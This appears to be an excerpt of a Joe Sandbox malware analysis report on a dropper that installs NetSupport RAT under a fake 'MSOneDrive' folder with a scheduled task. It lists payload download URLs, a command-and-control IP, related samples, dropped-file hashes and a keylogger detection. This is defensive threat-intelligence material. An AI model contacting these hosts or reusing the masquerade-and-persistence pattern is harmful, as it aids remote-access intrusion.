                                  http://%s/fakeurl.htmclient32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mlm-cdn.com/ssd/sdn1.ziplSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1318840314.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.microsoSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1372124884.00000000037A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://sectigo.com/CPS0Bremcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://sectigo.com/CPS0Cpcicapi.dll.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://sectigo.com/CPS0DSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mlm-cdn.com/1SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mlm-cdn.com/ssd/sdn2.zip2aSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://mlm-cdn.com/SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.pci.co.uk/supportclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://sectigo.com/CPS0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.crossteccorp.comSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.thawte.com0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | pcicapi.dll.3.dr, remcmdstub.exe.3.dr | false
• 0%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
http://127.0.0.1 | client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | false
• 1%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
https://mlm-cdn.com/ssd/sdn4.zipj | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
http://www.symauth.com/cps0( | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.dr | false
• 0%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
http://geo.netsupportsoftware.com/ | client32.exe, 0000000B.00000003.1671103639.0000000001162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3746392967.0000000001162000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.dr | false
• Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.dr | false
• URL Reputation: safe
unknown
http://www.symauth.com/rpa00 | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.dr | false
• Avira URL Cloud: safe
unknown
https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$ | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.dr | false
• Avira URL Cloud: safe
unknown
https://mlm-cdn.com/k | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
https://mlm-cdn.com/ssd/sdn4.zipJ | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | false
unknown
https://mlm-cdn.com/ssd/sdn4.zipL | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.11.212.184 | mlm-cdn.com | United States | 54290 | HOSTWINDSUS | false
172.67.68.212 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
37.1.209.225 | armayalitim.com | Ukraine | 29802 | HVC-ASUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1514955
Start date and time: 2024-09-21 14:44:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
Detection: MAL
Classification: mal80.rans.evad.winEXE@7/34@10/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 120
• Number of non-executed functions: 192
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:03:10 | API Interceptor | 10901831x Sleep call for process: client32.exe modified
14:45:40 | Task Scheduler | Run new task: MSOneDrive path: C:\Users\user\AppData\Local/MSOneDrive\client32.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
142.11.212.184 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
142.11.212.184 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
142.11.212.184 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
172.67.68.212 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | 8hN4C25a0O.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | FakturaPDF.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | JbZaDxFXF3.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | file.exe | Get hash | malicious | NetSupport RAT, LummaC Stealer, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | MDE_File_Sample_fb7baecc9f46e01492b4e3e6409d6c73f83a1169.zip | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | XCIlhzFXdplpXdhQXCyywBkGlU.ps1 | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | tOUKLPvSz.ps1 | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
172.67.68.212 | R6aeFGF7gU.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
37.1.209.225 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | http://37.1.209.225/fakeurl.htm
37.1.209.225 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | http://37.1.209.225/fakeurl.htm
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geo.netsupportsoftware.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
geo.netsupportsoftware.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 172.67.68.212
geo.netsupportsoftware.com | upd_8707558.msix | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
geo.netsupportsoftware.com | 8hN4C25a0O.exe | Get hash | malicious | NetSupport RAT | Browse | 172.67.68.212
geo.netsupportsoftware.com | information_package.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader, Stealc, Vidar | Browse | 104.26.0.231
geo.netsupportsoftware.com | Update.js | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
geo.netsupportsoftware.com | FakturaPDF.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
geo.netsupportsoftware.com | FakturaPDF.exe | Get hash | malicious | NetSupport RAT | Browse | 172.67.68.212
armayalitim.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 37.1.209.225
armayalitim.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 37.1.209.225
mlm-cdn.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
mlm-cdn.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
mlm-cdn.com | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
HOSTWINDSUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
HOSTWINDSUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
HOSTWINDSUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
HOSTWINDSUS | Please sign this document - Signature requested by HR Notices.eml | Get hash | malicious | HTMLPhisher | Browse | 142.11.211.206
HOSTWINDSUS | Brownsburg Fire Territory.pdf | Get hash | malicious | Unknown | Browse | 192.236.147.242
HOSTWINDSUS | information_package.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader, Stealc, Vidar | Browse | 192.236.208.115
HOSTWINDSUS | https://www.qrcreator.com/qr/C9948D09 | Get hash | malicious | HTMLPhisher | Browse | 23.238.35.10
HOSTWINDSUS | https://www.qrcreator.com/qr/1CFCF746 | Get hash | malicious | Phisher | Browse | 23.238.35.10
HVC-ASUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 37.1.209.225
HVC-ASUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 37.1.209.225
HVC-ASUS | kEwKRoptwZ.lnk | Get hash | malicious | Unknown | Browse | 23.227.203.67
HVC-ASUS | KgrUaCcfSR.lnk | Get hash | malicious | Unknown | Browse | 23.227.203.67
HVC-ASUS | MicrosoftEdge.msi | Get hash | malicious | ORPCBackdoor | Browse | 162.252.175.145
HVC-ASUS | MicrosoftEdge.msi | Get hash | malicious | ORPCBackdoor | Browse | 162.252.175.145
HVC-ASUS | https://funnelverse.com/wp-includes/css/americanexpress/nDw8DT | Get hash | malicious | HTMLPhisher | Browse | 23.111.168.85
HVC-ASUS | https://sharepoint-office.anzsomasm2023.com.au/?YLBL3J=J5 | Get hash | malicious | HTMLPhisher | Browse | 23.227.196.112
CLOUDFLARENETUS | SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exe | Get hash | malicious | LummaC | Browse | 172.67.173.81
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
CLOUDFLARENETUS | SPW AW25 - PO.010 SMS.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 172.67.187.100
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
CLOUDFLARENETUS | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exe | Get hash | malicious | Unknown | Browse | 104.21.64.194
CLOUDFLARENETUS | SPW AW25 - PO.010 SMS.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | Get hash | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | UpUZDmZZSa.doc | Get hash | malicious | Unknown | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | dns3BZKZ8b.doc | Get hash | malicious | Unknown | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | kP7FtdeE0f.doc | Get hash | malicious | Unknown | Browse | 142.11.212.184
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | Vidar | Browse | 142.11.212.184
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | Teams.exe | Get hash | malicious | NetSupport RAT | Browse |
C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL | SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe | Get hash | malicious | NetSupport RAT | Browse |
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 78840
Entropy (8bit): 6.635830973981154
Encrypted: false
SSDEEP: 1536:96Y+zbZm8/v/k957pyPkLDfORFMTlrSWqNj5CdnTrioQ+ywlj5CdnTXZQ+8iA:96Y+HQ8/3k9RppYFclrLqNj5CdnTrIwp
MD5: 2A82792F7B45D537EDFE58EB758C1197
SHA1: A039182D4D1EF29C6D8C238F20F7B8218C28F90C
SHA-256: 05AA13A6C1D18F691E552F04A996960917202A322D0DACFD330E553AD56978ED
SHA-512: C6C6799B386E0D6489D9346F1D403B03B9425572E7418A93A72C413A4B9413945AAF4EA97A7D7B65772E5E3F00CFF65F180F6FEF51A26D4FDC2FF063816B5386
Malicious: false
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
• Filename: Teams.exe, Detection: malicious, Browse
Reputation: moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........7......................:....................2......3......4....Rich...........................PE..L...gf.a...........!.....|...d......E1............0.......................... ......................................@...-...t...P.......h................O..........`..................................@...............(............................text....z.......|.................. ..`.rdata..m6.......8..................@..@.data...`...........................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 313552
Entropy (8bit): 6.750063959044223
Encrypted: false
SSDEEP: 6144:Jd0nVF1ZtRq6itu9i3uxUnNPhMKj8TwFIKhJ08fvF0dGhZUbol:JYZrokUnNPhMY8TwFIcJB0i
MD5: 3EED18B47412D3F91A394AE880B56ED2
SHA1: 1B521A3ED4A577A33CCE78EEE627AE02445694AB
SHA-256: 13A17F2AD9288AAC8941D895251604BEB9524FA3C65C781197841EE15480A13F
SHA-512: 835F35AF4FD241CAA8B6A639626B8762DB8525CCCEB43AFE8FFFC24DFFAD76CA10852A5A8E9FC114BFBF7D1DC1950130A67037FC09B63A74374517A1F5448990
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
Reputation: low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f./.".A.".A.".A.9i.5.A.+..+.A.".@...A.9i...A.9i.X.A.9i.#.A.9i.#.A.9i.#.A.Rich".A.........................PE..L...!l>T...........!................V8.......................................@............@..........................c..1....W..d.......8......................../...................................>..@...............h............................text............................... ..`.rdata.............................@..@.data...lt...p...(...P..............@....rsrc...8............x..............@..@.reloc...0.......2..................@..B........................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 262
Entropy (8bit): 5.159412672243952
Encrypted: false
SSDEEP: 6:O/oPuHk4xRPjwx35vydDKHMoEEjLgpW2MOzx7oUIXZNWYpPM/ioeU6a8l6i7s:X0ZR7wxDJjjqW2MORzaNBPM/ioeUH8lM
MD5: B9956282A0FED076ED083892E498AC69
SHA1: D14A665438385203283030A189FF6C5E7C4BF518
SHA-256: FCC6AFD664A8045BD61C398BE3C37A97536A199A48D277E11977F93868AE1ACC
SHA-512: 7DAA09113C0E8A36C91CC6D657C65851A20DFF6B60AC3D2F40C5737C12C1613C553955F84D131BA2139959973FEF9FC616CA5E968CB16C25ACF2D4739EED87EB
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1200..0x27aa3c3....; NetSupport License File...; Generated on 15:44 - 29/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=DCVTTTUUEEW23..maxslaves=100000..os2=1..product=10..serial_no=NSM896597..shrink_wrap=0..transport=0..
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 28656
Entropy (8bit): 6.972247952476263
Encrypted: false
SSDEEP: 768:X52mBHj1XCdnJ8EriRGp9E+l/kaTj1XCdnJ8EZp9E+8iROA:JPBHj5CdnTrioQ+l/kaTj5CdnTZQ+8iX
MD5: E311935A26EE920D5B7176CFA469253C
SHA1: EDA6C815A02C4C91C9AACD819DC06E32ECECF8F0
SHA-256: 0038AB626624FA2DF9F65DD5E310B1206A9CD4D8AB7E65FB091CC25F13EBD34E
SHA-512: 48164E8841CFC91F4CBF4D3291D4F359518D081D9079A7995378F970E4085B534F4BAFC15B83F4824CC79B5A1E54457B879963589B1ACBCFE727A03EB3DFFD1C
Malicious: false
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 2%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........V...V...V...9.b.R.....f.W...9.`.W...9.T.S...9.U.T..._.m._...V...1...9.P.Z...9.e.W...9.d.W...9.c.W...RichV...........PE..L......^...........!......................... ...............................`.......e....@.........................p#..r....!..P....@............... ...O...P......P ............................... ..@............ ..D............................text...*........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3461200
Entropy (8bit): 6.522430452238238
Encrypted: false
SSDEEP: 49152:oMnz9yqTXur/eAtTAh8bWbxnwDnsT2kaOgkcwSENUv7O:oMnzIqTXuCAtUh8b5xggAS7zO
MD5: F782C24A376285C9B8A3A116175093F8
SHA1: B8FDB6E95C7313CF31F14A3A31CC334B56E6DF09
SHA-256: C7BAF1647F6FEF1B1A4231C9743F20F7A4B524CA4EB987A0ACBEEEF7E037D7E3
SHA-512: 256385A6663DCF70A5A9A1B766D1F826760F07EFA9B9248047DC43D41F6A9F4DD56CA2B218C222EA1D441E2F7BA9BB114CDE6954827B9761EBB1F23BBA7AD1BB
Malicious: false
Yara Hits:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
